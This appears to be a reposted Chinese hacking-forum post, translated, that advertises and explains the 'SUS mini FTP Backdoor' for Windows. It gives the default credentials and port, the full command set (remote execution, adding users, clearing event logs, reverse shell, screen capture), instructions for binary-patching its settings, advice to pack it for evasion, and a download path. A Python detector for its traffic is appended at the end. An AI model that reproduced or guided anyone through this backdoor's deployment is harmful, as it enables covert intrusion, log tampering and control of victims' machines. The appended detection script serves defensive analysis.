SUS mini FTP Backdoor

Source: Internet
Author: User
Tags: ftp commands, ftp connection
This backdoor is genuinely novel: it is built into a small FTP server, so it can transfer large numbers of files quickly and reliably without giving up the powerful control functions of a backdoor. It keeps a slim footprint while remaining stealthy and stable, and it needs no dedicated client program, so it can be controlled at any time, from anywhere, under any conditions. With its original anti-virus evasion ("kill-free") features on top of that, what more is there to ask for?

This is the test version. The archive contains a single file named wmiapsrv.exe. To test it, extract it into a directory whose path contains no spaces, such as C:\Windows\System32, and run it. The server is then installed and running.

Any FTP client will do (including the ftp command and Internet Explorer that ship with Windows). Enter the server's IP address, port 2100, user name sus and password sus666. After confirming, the server's C: drive is displayed immediately.

How are the other control functions used? Two methods are provided:

1. Telnet
telnet <server IP> 2100
Enter "user sus", then "pass sus666". Once the server reports that you are logged on, you can enter a backdoor control command such as pslist.

2. ftp.exe
Run ftp.exe and enter "open <server IP> 2100", then follow the prompts to enter the user name sus and the password sus666 to log in. Besides the usual FTP commands, you can send a backdoor control command by prefixing it with quote, for example "quote pslist".

The dedicated backdoor control commands are listed when you enter help:
######################################################################
Thank you for using the SUS's FTP backdoor! Welcome to sus!
Author: dklkt Date: 2007.7
######################################################################

Winexec <exefilepath> using this to execute an executable file.
ShellExecute <exefilepath> the same to above.
Sethomedir <ftp's homedir> set the Home Directory of FTP's. Default is c :\
Getsysinfo get some system Infomation
Pslist list the process on the System
Pskill <pid> kill a process by its PID
Viewtermport view Terminal Service's port. Default is 3389
Settermport <portnum> set the Terminal Service's port.
Installterm Install terminal service.
Cleanevent clean the System Event Logs.
Enumservice list all the services in the system.
Startservice <servciename> Start a service. Like "Net start"
Stopservice <servicename> stop a service.
Deleteservice <servicename> delete a service.
Viewservice <servicename> View the detail of a service.
Configservice <servicename> <type> change service type (Auto, demand, disable)
Reboot reboot the system.
Shutdown power off the system.
Stopbackdoor stop the FTP backdoor without uninstall it.
Sendbackshell <ip> <port> send a back using shell. Use NC listen first
Startshell <port> Start a previous shell and listen. You can telnet it.
Catchscreen <BMP filepath> catch the screen now and save it to a BMP file.
Httpdownload <filepath>
Uninstall uninstall the FTP backdoor!
-------------------------------------------------
Good luck!

(My English is not good, so there are many grammar problems; hopefully you can still understand it easily ^_^)

For example, to run the program c:\mm.exe in Telnet mode, enter
Winexec c:\mm.exe

To add a system user in FTP mode, enter
Quote ShellExecute net.exe user AAA /Add

In Telnet mode you can enter
Sethomedir D:\

In FTP mode the quote prefix is added:
Quote sethomedir D:\

In addition, although this is a test version, it has not been specially packed. You can also change the user name and password by hand as needed: use UltraEdit or a similar tool to search for the string sus666 and edit it. The port can be changed too. 2100 in hexadecimal is 0x834, and since it is stored in reversed (little-endian) byte order you search for the bytes 34 08, at roughly offset A230, and change them to the value you want; for example, to use port 21, change them to 15 00. I hope you will use it yourself rather than spreading it around, and it is better to pack it first before using it as a backdoor.

I almost forgot; here are its features:
The backdoor installs itself as a self-starting system service. Once started it disguises itself as an svchost process (close to 100% alike) and passes through the firewall, so common auxiliary tools are unlikely to spot it. You can use the stopbackdoor command to stop the backdoor and the uninstall command to remove it.
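As an added defender-side example, not part of the original post or of the tool itself, the following Python script scans FTP control-channel command logs for the indicators this write-up gives: the default port 2100, the default sus/sus666 credentials, and the dedicated control verbs from the help listing. Because the port and credentials can be patched in the binary as described above, the script treats the port as a weak indicator and the command vocabulary as the strong one. The log line format and the sample lines are constructed for this example and are not from any real capture.

```python
"""Flag SUS mini FTP backdoor activity in FTP control-channel command logs.

Constructed log format (one FTP command per line):
    <src ip>:<src port> -> <dst ip>:<dst port> <raw command line>
"""
import re

# Indicators taken from the write-up above.
DEFAULT_PORT = 2100
DEFAULT_USER = "sus"
DEFAULT_PASS = "sus666"

# Dedicated control verbs from the backdoor's help output, lowercased.
BACKDOOR_COMMANDS = {
    "winexec", "shellexecute", "sethomedir", "getsysinfo", "pslist", "pskill",
    "viewtermport", "settermport", "installterm", "cleanevent", "enumservice",
    "startservice", "stopservice", "deleteservice", "viewservice",
    "configservice", "reboot", "shutdown", "stopbackdoor", "sendbackshell",
    "startshell", "catchscreen", "httpdownload", "uninstall",
}

LOG_RE = re.compile(
    r"^(?P<src>\d{1,3}(?:\.\d{1,3}){3}:\d+)\s*->\s*"
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+(?P<cmd>.+)$"
)


def parse_command(raw):
    """Split an FTP control line into (verb, argument) with a lowercased verb.

    ftp.exe's "quote X" sends X verbatim on the wire, so a leading "quote " is
    stripped in case the log came from a client's command history rather than
    from the network.
    """
    text = raw.strip()
    if text.lower().startswith("quote "):
        text = text[6:].strip()
    verb, _, arg = text.partition(" ")
    return verb.lower(), arg.strip()


def analyze(lines):
    """Return a list of alerts, each {"session", "severity", "reason", "line"}."""
    alerts = []
    pending_user = {}  # session -> last USER value, paired with the next PASS
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # constructed format only; skip anything else
        session = (m["src"], m["dst"], int(m["port"]))
        verb, arg = parse_command(m["cmd"])
        if verb == "user":
            pending_user[session] = arg.lower()
            if session[2] == DEFAULT_PORT:
                # Weak: the port is patchable, so this alone is only a hint.
                alerts.append({"session": session, "severity": "low",
                               "reason": "FTP login on default backdoor port 2100",
                               "line": line})
        elif verb == "pass":
            if pending_user.get(session) == DEFAULT_USER and arg == DEFAULT_PASS:
                alerts.append({"session": session, "severity": "high",
                               "reason": "default SUS credentials",
                               "line": line})
        elif verb in BACKDOOR_COMMANDS:
            # Strong: these verbs are not FTP commands at all, regardless of port.
            alerts.append({"session": session, "severity": "high",
                           "reason": f"backdoor command '{verb}'",
                           "line": line})
    return alerts


# Constructed sample log: one session on the default port using the default
# credentials and control verbs, two ordinary sessions on port 21, one of
# which issues a control verb (a server whose port was patched).
SAMPLE_LOG = """\
10.0.0.5:51234 -> 10.0.0.9:2100 USER sus
10.0.0.5:51234 -> 10.0.0.9:2100 PASS sus666
10.0.0.5:51234 -> 10.0.0.9:2100 PWD
10.0.0.5:51234 -> 10.0.0.9:2100 pslist
10.0.0.5:51234 -> 10.0.0.9:2100 quote Sethomedir D:\\
10.0.0.7:40001 -> 10.0.0.9:21 USER anonymous
10.0.0.7:40001 -> 10.0.0.9:21 PASS guest@example.com
10.0.0.7:40001 -> 10.0.0.9:21 LIST
10.0.0.8:40002 -> 10.0.0.9:21 USER bob
10.0.0.8:40002 -> 10.0.0.9:21 PASS hunter2
10.0.0.8:40002 -> 10.0.0.9:21 sethomedir D:\\
""".splitlines()


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        src, dst, port = alert["session"]
        print(f"[{alert['severity']}] {src} -> {dst}:{port}: {alert['reason']}")
```

The second port-21 session shows why matching on the command vocabulary matters: a server with the port bytes patched as described above produces no port hit and no credential hit, but its control verbs still have no place in RFC 959 traffic.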

/Files/allyesno/wmiapsrv.rar
